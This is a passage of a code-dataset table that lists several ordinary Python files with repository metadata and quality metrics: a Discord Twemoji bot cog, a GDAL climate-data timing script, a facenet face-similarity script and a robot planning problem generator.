hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c915f05bb0ce24d1fe5469fea260ce3e99ceb13c
| 5,144
|
py
|
Python
|
bot/exts/utilities/twemoji.py
|
thatbirdguythatuknownot/sir-lancebot
|
7fd74af261385bdf7d989f459bec4c9b0cb4392a
|
[
"MIT"
] | 77
|
2018-11-19T18:38:50.000Z
|
2020-11-16T22:49:59.000Z
|
bot/exts/utilities/twemoji.py
|
thatbirdguythatuknownot/sir-lancebot
|
7fd74af261385bdf7d989f459bec4c9b0cb4392a
|
[
"MIT"
] | 373
|
2018-11-17T16:06:06.000Z
|
2020-11-20T22:55:03.000Z
|
bot/exts/utilities/twemoji.py
|
thatbirdguythatuknownot/sir-lancebot
|
7fd74af261385bdf7d989f459bec4c9b0cb4392a
|
[
"MIT"
] | 165
|
2018-11-19T04:04:44.000Z
|
2020-11-18T17:53:28.000Z
|
import logging
import re
from typing import Literal, Optional
import discord
from discord.ext import commands
from emoji import UNICODE_EMOJI_ENGLISH, is_emoji
from bot.bot import Bot
from bot.constants import Colours, Roles
from bot.utils.decorators import whitelist_override
from bot.utils.extensions import invoke_help_command
# Module-level logger, named after this module per the standard logging pattern.
log = logging.getLogger(__name__)

# Base URLs for Twemoji source assets on the official Twitter repo (raw GitHub).
# Keyed by file format; get_url() appends "<codepoint>.<format>" to build a full URL.
BASE_URLS = {
    "png": "https://raw.githubusercontent.com/twitter/twemoji/master/assets/72x72/",
    "svg": "https://raw.githubusercontent.com/twitter/twemoji/master/assets/svg/",
}

# Matches a trailing run of 4-6 hex digits (a single emoji codepoint).
# NOTE(review): the leading class is [a-f1-9], so codepoints starting with "0"
# (e.g. "00a9") are rejected — presumably intentional for trimming prefixes
# like "U+1f1f8", but worth confirming.
CODEPOINT_REGEX = re.compile(r"[a-f1-9][a-f0-9]{3,5}$")
class Twemoji(commands.Cog):
    """Utilities for working with Twemojis."""

    def __init__(self, bot: Bot):
        # The bot instance the cog is attached to.
        self.bot = bot

    @staticmethod
    def get_url(codepoint: str, format: Literal["png", "svg"]) -> str:
        """Returns a source file URL for the specified Twemoji, in the corresponding format."""
        return f"{BASE_URLS[format]}{codepoint}.{format}"

    @staticmethod
    def alias_to_name(alias: str) -> str:
        """
        Transform a unicode alias to an emoji name.

        Example usages:
        >>> alias_to_name(":falling_leaf:")
        "Falling leaf"
        >>> alias_to_name(":family_man_girl_boy:")
        "Family man girl boy"
        """
        name = alias.strip(":").replace("_", " ")
        return name.capitalize()

    @staticmethod
    def build_embed(codepoint: str) -> discord.Embed:
        """Returns the main embed for the `twemoji` command."""
        # Rebuild the emoji character(s) from the dash-separated codepoint so
        # that its alias can be looked up in the emoji library's mapping.
        emoji = "".join(Twemoji.emoji(e) or "" for e in codepoint.split("-"))
        embed = discord.Embed(
            title=Twemoji.alias_to_name(UNICODE_EMOJI_ENGLISH[emoji]),
            description=f"{codepoint.replace('-', ' ')}\n[Download svg]({Twemoji.get_url(codepoint, 'svg')})",
            colour=Colours.twitter_blue,
        )
        # PNG rendering of the same emoji as the embed thumbnail.
        embed.set_thumbnail(url=Twemoji.get_url(codepoint, "png"))
        return embed

    @staticmethod
    def emoji(codepoint: Optional[str]) -> Optional[str]:
        """
        Returns the emoji corresponding to a given `codepoint`, or `None` if no emoji was found.

        The return value is an emoji character, such as "🍂". The `codepoint`
        argument can be of any format, since it will be trimmed automatically.
        """
        # Implicitly returns None when the codepoint cannot be trimmed.
        if code := Twemoji.trim_code(codepoint):
            return chr(int(code, 16))

    @staticmethod
    def codepoint(emoji: Optional[str]) -> Optional[str]:
        """
        Returns the codepoint, in a trimmed format, of a single emoji.

        `emoji` should be an emoji character, such as "🐍" and "🥰", and
        not a codepoint like "1f1f8". When working with combined emojis,
        such as "🇸🇪" and "👨👩👦", send the component emojis through the method
        one at a time.
        """
        if emoji is None:
            return None
        # e.g. ord("🍂") == 0x1f342 -> "1f342"
        return hex(ord(emoji)).removeprefix("0x")

    @staticmethod
    def trim_code(codepoint: Optional[str]) -> Optional[str]:
        """
        Returns the meaningful information from the given `codepoint`.

        If no codepoint is found, `None` is returned.

        Example usages:
        >>> trim_code("U+1f1f8")
        "1f1f8"
        >>> trim_code("\u0001f1f8")
        "1f1f8"
        >>> trim_code("1f466")
        "1f466"
        """
        # `or ""` guards against a None argument; an empty string never matches.
        if code := CODEPOINT_REGEX.search(codepoint or ""):
            return code.group()

    @staticmethod
    def codepoint_from_input(raw_emoji: tuple[str, ...]) -> str:
        """
        Returns the codepoint corresponding to the passed tuple, separated by "-".

        The return format matches the format used in URLs for Twemoji source files.

        Example usages:
        >>> codepoint_from_input(("🐍",))
        "1f40d"
        >>> codepoint_from_input(("1f1f8", "1f1ea"))
        "1f1f8-1f1ea"
        >>> codepoint_from_input(("👨👧👦",))
        "1f468-200d-1f467-200d-1f466"
        """
        raw_emoji = [emoji.lower() for emoji in raw_emoji]
        if is_emoji(raw_emoji[0]):
            # Input was an emoji character: iterate its component characters
            # (combined emojis such as flags consist of several codepoints).
            emojis = (Twemoji.codepoint(emoji) or "" for emoji in raw_emoji[0])
            return "-".join(emojis)
        # Otherwise treat every argument as a raw codepoint and validate that
        # the assembled characters really form an emoji.
        emoji = "".join(
            Twemoji.emoji(Twemoji.trim_code(code)) or "" for code in raw_emoji
        )
        if is_emoji(emoji):
            return "-".join(Twemoji.codepoint(e) or "" for e in emoji)
        raise ValueError("No codepoint could be obtained from the given input")

    @commands.command(aliases=("tw",))
    @whitelist_override(roles=(Roles.everyone,))
    async def twemoji(self, ctx: commands.Context, *raw_emoji: str) -> None:
        """Sends a preview of a given Twemoji, specified by codepoint or emoji."""
        # No arguments: show the command help instead of erroring.
        if len(raw_emoji) == 0:
            await invoke_help_command(ctx)
            return
        try:
            codepoint = self.codepoint_from_input(raw_emoji)
        except ValueError:
            raise commands.BadArgument(
                "please include a valid emoji or emoji codepoint."
            )
        await ctx.send(embed=self.build_embed(codepoint))
def setup(bot: Bot) -> None:
    """Register the Twemoji cog on the given bot instance."""
    cog = Twemoji(bot)
    bot.add_cog(cog)
| 34.066225
| 110
| 0.614891
| 633
| 5,144
| 4.909953
| 0.322275
| 0.023166
| 0.028958
| 0.021236
| 0.1287
| 0.083655
| 0.061133
| 0.034749
| 0
| 0
| 0
| 0.01918
| 0.260109
| 5,144
| 150
| 111
| 34.293333
| 0.793221
| 0.278771
| 0
| 0.092105
| 0
| 0.013158
| 0.123513
| 0.035377
| 0
| 0
| 0
| 0
| 0
| 1
| 0.118421
| false
| 0
| 0.131579
| 0
| 0.394737
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9188684a1a8b8220b62b9249ea8815fc31f7412
| 2,621
|
py
|
Python
|
experimentations/20-climate-data/test-perf.py
|
Kitware/spark-mpi-experimentation
|
9432b63130059fc54843bc5ca6f2f5510e5a4098
|
[
"BSD-3-Clause"
] | 4
|
2017-06-15T16:36:01.000Z
|
2021-12-25T09:13:22.000Z
|
experimentations/20-climate-data/test-perf.py
|
Kitware/spark-mpi-experimentation
|
9432b63130059fc54843bc5ca6f2f5510e5a4098
|
[
"BSD-3-Clause"
] | 1
|
2018-09-28T23:32:42.000Z
|
2018-09-28T23:32:42.000Z
|
experimentations/20-climate-data/test-perf.py
|
Kitware/spark-mpi-experimentation
|
9432b63130059fc54843bc5ca6f2f5510e5a4098
|
[
"BSD-3-Clause"
] | 6
|
2017-07-22T00:10:00.000Z
|
2021-12-25T09:13:11.000Z
|
from __future__ import print_function
import os
import sys
import time
import gdal
import numpy as np
# -------------------------------------------------------------------------
# Files to process
# -------------------------------------------------------------------------
# One GeoTIFF per year, 2006-2015. The names follow the NASA NEX-GDDP naming
# scheme (daily maximum temperature, BCSD-downscaled, RCP8.5, MRI-CGCM3 model).
fileNames = [
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2006.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2007.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2008.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2009.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2010.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2011.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2012.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2013.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2014.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2015.tif',
]
# Directory holding the GeoTIFFs listed above (machine-specific path).
basepath = '/data/sebastien/SparkMPI/data/gddp'

# -------------------------------------------------------------------------
# Read file and output (year|month, temp)
# -------------------------------------------------------------------------
def readFile(fileName):
    """Yield a (year, value) pair for every pixel of every band in the file.

    The year is parsed from the trailing "_YYYY.tif" portion of the file name.
    """
    year = fileName.split('_')[-1][:-4]
    print('year', year)
    ds = gdal.Open('%s/%s' % (basepath, fileName))
    band_total = ds.RasterCount
    for idx in range(band_total):
        raster = ds.GetRasterBand(idx + 1).ReadAsArray()
        for pixel in raster.flatten():
            yield (year, pixel)
# -----------------------------------------------------------------------------
def readFileAndCompute(fileName):
    """Read every band of the GeoTIFF and return (year, mean value).

    Values >= 50000 are treated as fill/no-data and excluded from the mean
    (same filter as the original). Fix: if *every* value is filtered out the
    original raised ZeroDivisionError on `total / count`; this version returns
    (year, None) instead so callers can detect an all-fill file.
    """
    year = fileName.split('_')[-1][:-4]
    print('year', year)
    dataset = gdal.Open('%s/%s' % (basepath, fileName))
    total = 0
    count = 0
    for bandId in range(dataset.RasterCount):
        band = dataset.GetRasterBand(bandId + 1).ReadAsArray()
        for value in band.flatten():
            if value < 50000:
                total += value
                count += 1
    # Guard against a file containing only fill values.
    if count == 0:
        return (year, None)
    return (year, total / count)
# -----------------------------------------------------------------------------
def readDoNothing(fileName):
    """Load each band into memory and print its shape; used purely for I/O timing."""
    year = fileName.split('_')[-1][:-4]
    print('year', year)
    handle = gdal.Open('%s/%s' % (basepath, fileName))
    n_bands = handle.RasterCount
    for band_index in range(n_bands):
        pixels = handle.GetRasterBand(band_index + 1).ReadAsArray()
        print(pixels.shape)
# -------------------------------------------------------------------------
# Read timing
# -------------------------------------------------------------------------
# Benchmark: wall-clock time to read (but not process) every listed file.
t0 = time.time()
for fileName in fileNames:
    readDoNothing(fileName)
t1 = time.time()
print('### Total execution time - %s ' % str(t1 - t0))
| 33.177215
| 79
| 0.518123
| 267
| 2,621
| 4.831461
| 0.299625
| 0.069767
| 0.100775
| 0.139535
| 0.648062
| 0.648062
| 0.648062
| 0.623256
| 0.37907
| 0.37907
| 0
| 0.054652
| 0.155284
| 2,621
| 78
| 80
| 33.602564
| 0.528004
| 0.254865
| 0
| 0.326923
| 0
| 0
| 0.290722
| 0.259794
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057692
| false
| 0
| 0.115385
| 0
| 0.192308
| 0.115385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c91fcc058836389aa81c0420f1fedf01f1106ff3
| 1,699
|
py
|
Python
|
similarity.py
|
Blair-Johnson/faceswap
|
79b75f7f112acb3bf6b228116facc4d0812d2099
|
[
"MIT"
] | null | null | null |
similarity.py
|
Blair-Johnson/faceswap
|
79b75f7f112acb3bf6b228116facc4d0812d2099
|
[
"MIT"
] | null | null | null |
similarity.py
|
Blair-Johnson/faceswap
|
79b75f7f112acb3bf6b228116facc4d0812d2099
|
[
"MIT"
] | 1
|
2021-11-04T08:21:07.000Z
|
2021-11-04T08:21:07.000Z
|
# Blair Johnson 2021
from facenet_pytorch import InceptionResnetV1, MTCNN
import numpy as np
def create_embeddings(images):
    '''
    Take an iterable of image candidates and return a list of face embeddings.

    A single image (anything that is not already a list) is wrapped in a
    one-element list, so callers may pass either one image or a list of images.
    Each image is face-cropped with MTCNN and encoded with InceptionResnetV1.
    '''
    # isinstance is the idiomatic (and subclass-friendly) type check; the
    # original used the brittle `type(images) != list` comparison.
    if not isinstance(images, list):
        images = [images]
    extractor = MTCNN()
    encoder = InceptionResnetV1(pretrained='vggface2').eval()
    embeddings = []
    for image in images:
        cropped_img = extractor(image)
        # unsqueeze(0) adds the batch dimension expected by the encoder.
        embeddings.append(encoder(cropped_img.unsqueeze(0)))
    return embeddings
def candidate_search(candidates, target):
    '''
    Take an iterable of candidates and a target image and determine the best
    candidate fit.

    Returns a (candidate, index) pair for the candidate whose embedding has
    the smallest Frobenius-norm distance to the target embedding.
    '''
    cand_embs = create_embeddings(candidates)
    target_embs = create_embeddings(target)[0]
    best_loss = np.inf
    # Start at 0 (first iteration always improves on np.inf); the original
    # initialized this to np.inf, which is not a valid index.
    best_candidate = 0
    for i, embedding in enumerate(cand_embs):
        loss = np.linalg.norm(target_embs.detach().numpy() - embedding.detach().numpy(), ord='fro')
        if loss < best_loss:
            best_loss = loss
            best_candidate = i
    # Bug fix: return the candidate at the *best* index. The original returned
    # candidates[i], i.e. always the last candidate examined, regardless of fit.
    return candidates[best_candidate], best_candidate
if __name__ == '__main__':
    # Manual smoke test: pick the candidate face closest to the target photo.
    # NOTE(review): all image paths are hard-coded to the author's machine.
    from PIL import Image
    import matplotlib.pyplot as plt
    test1 = np.array(Image.open('/home/bjohnson/Pictures/fake_face.jpg'))
    test2 = np.array(Image.open('/home/bjohnson/Pictures/old_face.jpg'))
    test3 = np.array(Image.open('/home/bjohnson/Pictures/young_face.jpg'))
    target = np.array(Image.open('/home/bjohnson/Pictures/profile_pic_lake_louise.png'))
    candidates = [test1,test2,test3]
    chosen, index = candidate_search(candidates, target)
    print(index)
    #plt.imshow(candidate_search(candidates, target))
| 29.807018
| 97
| 0.683343
| 211
| 1,699
| 5.345972
| 0.412322
| 0.056738
| 0.042553
| 0.056738
| 0.12766
| 0.12766
| 0.12766
| 0
| 0
| 0
| 0
| 0.011161
| 0.208946
| 1,699
| 56
| 98
| 30.339286
| 0.828125
| 0.138317
| 0
| 0
| 0
| 0
| 0.126397
| 0.113128
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.121212
| 0
| 0.242424
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c920d8ceac18d8c9ff46fde63a7fa287e05e877b
| 6,075
|
py
|
Python
|
opentamp/domains/robot_manipulation_domain/generate_base_prob.py
|
Algorithmic-Alignment-Lab/openTAMP
|
f0642028d551d0436b3a3dbc3bfb2f23a00adc14
|
[
"MIT"
] | 4
|
2022-02-13T15:52:18.000Z
|
2022-03-26T17:33:13.000Z
|
opentamp/domains/robot_manipulation_domain/generate_base_prob.py
|
Algorithmic-Alignment-Lab/OpenTAMP
|
eecb950bd273da8cbed4394487630e8453f2c242
|
[
"MIT"
] | 1
|
2022-02-13T22:48:09.000Z
|
2022-02-13T22:48:09.000Z
|
opentamp/domains/robot_manipulation_domain/generate_base_prob.py
|
Algorithmic-Alignment-Lab/OpenTAMP
|
eecb950bd273da8cbed4394487630e8453f2c242
|
[
"MIT"
] | null | null | null |
from IPython import embed as shell
import itertools
import numpy as np
import random
# SEED = 1234
NUM_PROBS = 1  # number of problem files to generate
NUM_CLOTH = 4  # number of cloth objects declared in each problem
filename = "probs/base_prob.prob"  # output path (relative to the working dir)
GOAL = "(RobotAt baxter robot_end_pose)"

# init Baxter pose
BAXTER_INIT_POSE = [0, 0, 0]
BAXTER_END_POSE = [0, 0, 0]
# 7-DOF joint angles for each arm; the commented values are earlier tunings.
R_ARM_INIT = [0, 0, 0, 0, 0, 0, 0] # [0, -0.8436, -0.09, 0.91, 0.043, 1.5, -0.05] # [ 0.1, -1.36681967, -0.23718529, 1.45825713, 0.04779009, 1.48501637, -0.92194262]
L_ARM_INIT = [0, 0, 0, 0, 0, 0, 0] # [-0.6, -1.2513685 , -0.63979997, 1.41307933, -2.9520384, -1.4709618, 2.69274026]
# Gripper apertures (meters).
OPEN_GRIPPER = [0.02]
CLOSE_GRIPPER = [0.015]
# Monitoring arm configurations (first two joints swung left/right by 45°).
MONITOR_LEFT = [np.pi/4, -np.pi/4, 0, 0, 0, 0, 0]
MONITOR_RIGHT = [-np.pi/4, -np.pi/4, 0, 0, 0, 0, 0]
CLOTH_ROT = [0, 0, 0]
# Table half-extents and placement relative to the robot base.
TABLE_GEOM = [1.23/2, 2.45/2, 0.97/2]
TABLE_POS = [1.23/2-0.1, 0, 0.97/2-0.375-0.665]
TABLE_ROT = [0,0,0]
ROBOT_DIST_FROM_TABLE = 0.05
# Angular regions around the table (radians).
REGION1 = [np.pi/4]
REGION2 = [0]
REGION3 = [-np.pi/4]
REGION4 = [-np.pi/2]
# Initial cloth positions: every coordinate 0.615 — presumably a placeholder
# height; verify against the domain config. Converted to nested lists.
cloth_init_poses = np.ones((NUM_CLOTH, 3)) * 0.615
cloth_init_poses = cloth_init_poses.tolist()
def get_baxter_pose_str(name, LArm = L_ARM_INIT, RArm = R_ARM_INIT, G = OPEN_GRIPPER, Pos = BAXTER_INIT_POSE):
    """Build the init-file fragment describing a fully-specified BaxterPose symbol."""
    fragments = [
        "(left {} {}), ".format(name, LArm),
        "(left_gripper {} {}), ".format(name, G),
        "(right {} {}), ".format(name, RArm),
        "(right_gripper {} {}), ".format(name, G),
        "(value {} {}), ".format(name, Pos),
    ]
    return "".join(fragments)
def get_baxter_str(name, LArm = L_ARM_INIT, RArm = R_ARM_INIT, G = OPEN_GRIPPER, Pos = BAXTER_INIT_POSE):
    """Build the init-file fragment describing the Baxter robot object itself.

    NOTE(review): unlike every other attribute entry, the leading "(geom {})"
    fragment carries no trailing ", " separator, so it runs directly into the
    next entry. The cloth entries in main() emit "(geom ...), " — confirm the
    consumer tolerates the missing separator or whether this is a latent bug.
    """
    pieces = (
        "(geom {})".format(name),
        "(left {} {}), ".format(name, LArm),
        "(left_gripper {} {}), ".format(name, G),
        "(right {} {}), ".format(name, RArm),
        "(right_gripper {} {}), ".format(name, G),
        "(pose {} {}), ".format(name, Pos),
    )
    return "".join(pieces)
def get_undefined_robot_pose_str(name):
    """Build the init-file fragment for a BaxterPose whose attributes are all undefined."""
    attrs = ("left", "left_gripper", "right", "right_gripper", "value")
    return "".join("({} {} undefined), ".format(attr, name) for attr in attrs)
def get_undefined_symbol(name):
    """Build the init-file fragment for a target symbol with undefined value and rotation."""
    return "(value {} undefined), ".format(name) + "(rotation {} undefined), ".format(name)
def main():
    """Generate NUM_PROBS problem file(s) describing the base cloth-manipulation problem.

    Assembles the Objects, Init and Goal sections of a .prob file as one large
    string and writes it to `filename`.
    NOTE(review): every iteration writes to the same `filename`, so with
    NUM_PROBS > 1 each run overwrites the previous file — confirm intent.
    """
    for iteration in range(NUM_PROBS):
        # Header comments for the generated file.
        s = "# AUTOGENERATED. DO NOT EDIT.\n# Configuration file for CAN problem instance. Blank lines and lines beginning with # are filtered out.\n\n"
        s += "# The values after each attribute name are the values that get passed into the __init__ method for that attribute's class defined in the domain configuration.\n"
        # --- Objects section: declare every symbol used in the problem. ---
        s += "Objects: "
        s += "Baxter (name baxter); "
        for i in range(NUM_CLOTH):
            s += "Cloth (name {}); ".format("cloth{0}".format(i))
            s += "ClothTarget (name {}); ".format("cloth_target_{0}".format(i))
            s += "ClothTarget (name {}); ".format("cloth{0}_init_target".format(i))
            s += "ClothTarget (name {}); ".format("cloth{0}_end_target".format(i))
        # NOTE(review): the .format(i) calls below are no-ops (the strings have
        # no placeholder) — presumably copy-paste leftovers from per-cloth lines.
        s += "BaxterPose (name {}); ".format("cloth_grasp_begin".format(i))
        s += "BaxterPose (name {}); ".format("cloth_grasp_end".format(i))
        s += "BaxterPose (name {}); ".format("cloth_putdown_begin".format(i))
        s += "BaxterPose (name {}); ".format("cloth_putdown_end".format(i))
        s += "ClothTarget (name {}); ".format("middle_target_1")
        s += "ClothTarget (name {}); ".format("middle_target_2")
        s += "ClothTarget (name {}); ".format("left_mid_target")
        s += "ClothTarget (name {}); ".format("right_mid_target")
        s += "BaxterPose (name {}); ".format("robot_init_pose")
        s += "BaxterPose (name {}); ".format("robot_end_pose")
        s += "Obstacle (name {}) \n\n".format("table")
        # --- Init section: initial values for every declared symbol. ---
        s += "Init: "
        for i in range(NUM_CLOTH):
            s += "(geom cloth{0}), ".format(i)
            s += "(pose cloth{0} {1}), ".format(i, [0, 0, 0])
            s += "(rotation cloth{0} {1}), ".format(i, [0, 0, 0])
            s += "(value cloth{0}_init_target [0, 0, 0]), ".format(i)
            s += "(rotation cloth{0}_init_target [0, 0, 0]), ".format(i)
            s += "(value cloth_target_{0} [0, 0, 0]), ".format(i)
            s += "(rotation cloth_target_{0} [0, 0, 0]), ".format(i)
            s += "(value cloth{0}_end_target [0, 0, 0]), ".format(i)
            s += "(rotation cloth{0}_end_target [0, 0, 0]), ".format(i)
        s += "(value middle_target_1 [0, 0, 0]), "
        s += "(rotation middle_target_1 [0, 0, 0]), "
        s += "(value middle_target_2 [0, 0, 0]), "
        s += "(rotation middle_target_2 [0, 0, 0]), "
        s += "(value left_mid_target [0, 0, 0]), "
        s += "(rotation left_mid_target [0, 0, 0]), "
        s += "(value right_mid_target [0, 0, 0]), "
        s += "(rotation right_mid_target [0, 0, 0]), "
        # Grasp/putdown waypoints start undefined (solved by the planner);
        # again the .format(i) calls are no-ops.
        s += get_undefined_robot_pose_str("cloth_grasp_begin".format(i))
        s += get_undefined_robot_pose_str("cloth_grasp_end".format(i))
        s += get_undefined_robot_pose_str("cloth_putdown_begin".format(i))
        s += get_undefined_robot_pose_str("cloth_putdown_end".format(i))
        s += get_baxter_str('baxter', L_ARM_INIT, R_ARM_INIT, OPEN_GRIPPER, BAXTER_INIT_POSE)
        s += get_baxter_pose_str('robot_init_pose', L_ARM_INIT, R_ARM_INIT, OPEN_GRIPPER, BAXTER_INIT_POSE)
        # s += get_baxter_pose_str('robot_end_pose', L_ARM_INIT, R_ARM_INIT, OPEN_GRIPPER, BAXTER_END_POSE)
        s += get_undefined_robot_pose_str('robot_end_pose')
        s += "(geom table {}), ".format(TABLE_GEOM)
        s += "(pose table {}), ".format(TABLE_POS)
        s += "(rotation table {}); ".format(TABLE_ROT)
        # Initial predicates.
        s += "(RobotAt baxter robot_init_pose),"
        s += "(StationaryBase baxter), "
        s += "(IsMP baxter), "
        s += "(WithinJointLimit baxter), "
        s += "(StationaryW table) \n\n"
        # --- Goal section. ---
        s += "Goal: {}".format(GOAL)
        with open(filename, "w") as f:
            f.write(s)

if __name__ == "__main__":
    main()
| 41.047297
| 175
| 0.576461
| 893
| 6,075
| 3.698768
| 0.164614
| 0.039964
| 0.037239
| 0.020587
| 0.57584
| 0.495913
| 0.442022
| 0.363003
| 0.261278
| 0.236452
| 0
| 0.063698
| 0.227325
| 6,075
| 147
| 176
| 41.326531
| 0.639966
| 0.055144
| 0
| 0.169492
| 0
| 0.016949
| 0.38322
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042373
| false
| 0.008475
| 0.033898
| 0
| 0.110169
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9210c12cb167b3a01782592accbb83cee14ae03
| 2,633
|
py
|
Python
|
tests/views/test_hsva.py
|
ju-sh/colorviews
|
b9757dd3a799d68bd89966852f36f06f21e36072
|
[
"MIT"
] | 5
|
2021-06-10T21:12:16.000Z
|
2022-01-14T05:04:03.000Z
|
tests/views/test_hsva.py
|
ju-sh/colorviews
|
b9757dd3a799d68bd89966852f36f06f21e36072
|
[
"MIT"
] | null | null | null |
tests/views/test_hsva.py
|
ju-sh/colorviews
|
